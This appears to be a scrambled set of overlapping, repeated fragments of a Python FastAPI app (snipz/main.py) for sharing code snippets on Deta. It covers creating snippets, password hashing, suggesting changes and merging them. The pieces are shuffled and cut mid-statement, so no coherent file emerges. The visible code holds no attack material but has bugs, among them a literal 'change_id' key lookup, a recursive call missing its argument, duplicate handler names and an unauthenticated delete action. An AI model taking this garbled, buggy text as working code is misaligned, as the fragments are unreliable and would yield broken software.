review_snippet(snippet_id: str):", "str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password:", "such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet =", "async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id,", "Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from pydantic import BaseModel", "in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\" if", "such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"])", "async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet))", "gen_change_id() return key class Snippet(BaseModel): name: str code: str snip_id: str = gen_id()", "secrets, string from deta.lib import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses", "SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return", "return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits =", "gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i", "{\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet", "return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return", "CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def", "str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id)", "del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"}", "= \"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id()", "https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883", "get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError:", "return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return", "return False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\")", "merge_change(snippet_id: str, change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid", "def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except", "https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast)", "if not snippet: return False else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password):", "i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\"", "try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\":", "import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from pydantic", "change except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in", "else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\")", "str code: str snip_id: str = gen_id() proposed_changes: dict = {} history: list", "= SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\":", "@app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password):", "snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha =", "Snippet(BaseModel): name: str code: str snip_id: str = gen_id() proposed_changes: dict = {}", "str snip_id: str = gen_id() proposed_changes: dict = {} history: list = []", "get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet) if not verify_password(password,", "= Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async", "FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 #", "def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except", "event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i", "@app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] =", "name: str code: str snip_id: str = gen_id() proposed_changes: dict = {} history:", "False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def", "Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet =", "change = changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha =", "= new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict)", "key class Snippet(BaseModel): name: str code: str snip_id: str = gen_id() proposed_changes: dict", "# snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app", "in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id,", "i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def", "KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return", "= get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet) if not", "snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\")", "snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\")", "= \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2))", "snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha", "deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id):", "return change except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i", "JSON from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import", "authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change =", "import BaseModel from jinja2 import Template # This is a regular FastAPI app.", "authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not snippet: return False else:", "a regular FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html:", "snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def", "review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md:", "gen_id() return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"]", "snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try:", "snippet = get_snippet(snip_id) if not snippet: return False else: snippet = SnipInDB(**snippet) if", "snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password)", "@app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id = event.json[\"snip_id\"] snippets.delete(snip_id) return", "{\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id", "\"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password): if", "deta.lib import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from", "snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template =", "= Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except", "SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet", "get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str code: str snip_id:", "return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password:", "def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except", "try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\":", "jinja2 import Template # This is a regular FastAPI app. Read the docs", "changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for", "return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id:", "get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError:", "= snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id):", "in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class", "return key class Snippet(BaseModel): name: str code: str snip_id: str = gen_id() proposed_changes:", "passlib.context import CryptContext from pydantic import BaseModel from jinja2 import Template # This", "KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change):", "import CryptContext from pydantic import BaseModel from jinja2 import Template # This is", "return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler():", "range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel):", "return False else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return", "KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str,", "hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet =", "new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\")", "get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change", "if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def main_handler(): main =", "FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password,", "change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"}", "verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet", "import Template # This is a regular FastAPI app. Read the docs of", "KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def", "app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html:", "return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try:", "from jinja2 import Template # This is a regular FastAPI app. Read the", "snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key", "range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id,", "def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for", "@app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return", "async def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict()", "class Snippet(BaseModel): name: str code: str snip_id: str = gen_id() proposed_changes: dict =", "Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def", "css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict =", "val = get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in", "from pydantic import BaseModel from jinja2 import Template # This is a regular", "import HTMLResponse from deta.lib.responses import JSON from fastapi import FastAPI, Response from fastapi.middleware.cors", "= Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async", "digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"):", "range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id):", "Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password)", "= snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key =", "try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id]", "from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from fastapi import FastAPI, Response", "snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return", "= change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"}", "try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event):", "hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet =", "such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password): if not", "@app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return val def gen_id():", "pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return", "such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id = event.json[\"snip_id\"]", "@app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"]", "\"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return", "key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name:", "https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets = Database(\"snippets\")", "<filename>snipz/main.py import secrets, string from deta.lib import App, Database from fastapi.responses import HTMLResponse", "def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read()", "KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template", "digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return", "def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try:", "# suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 #", "pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None", "not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read()", "fastapi.responses import HTMLResponse from deta.lib.responses import JSON from fastapi import FastAPI, Response from", "SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def main_handler(): main", "= Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def", "# main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets", "\"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code =", "Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id:", "open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\")", "snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event):", "return {\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code)", "@app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css =", "snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val =", "proposed_changes: dict = {} history: list = [] password: str = \"<PASSWORD>\" class", "main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets =", "= get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4))", "class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str):", "return gen_id() return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change =", "gen_id() proposed_changes: dict = {} history: list = [] password: str = \"<PASSWORD>\"", "= SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def main_handler():", "fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from pydantic import BaseModel from jinja2", "snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def", "del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read()))", "snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet", "= Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such", "return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits =", "Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"]", "try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError:", "suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py:", "main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return", "docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html:", "snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password): if not authenticate_merge(snippet_id,", "from deta.lib.responses import JSON from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware", "except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\")", "main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css,", "key = event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase)", "password: str = \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class", "str def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not snippet: return", "of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512", "def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\")", "snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id = event.json[\"snip_id\"] snippets.delete(snip_id)", "f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id): try: changes =", "if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"])", "except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change:", "Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all())", "regular FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030", "@app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip:", "\"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id =", "val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits)", "= FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def", "the docs of FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 #", "except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key)", "CORSMiddleware from passlib.context import CryptContext from pydantic import BaseModel from jinja2 import Template", "show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError:", "def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event): snip_id = event.json[\"snip_id\"] snippets.delete(snip_id) return len(snippets.all())", "return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id:", "history: list = [] password: str = \"<PASSWORD>\" class Password(BaseModel): password: str class", "\"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key", "verify_password(password, snippet.hashed_password): return False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return", "return snippet except KeyError: return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val", "return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return", "\"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet =", "snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such", "Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"}", "= \"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return", "= SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict())", "def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id,", "= f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str", "str = gen_id() proposed_changes: dict = {} history: list = [] password: str", "HTMLResponse from deta.lib.responses import JSON from 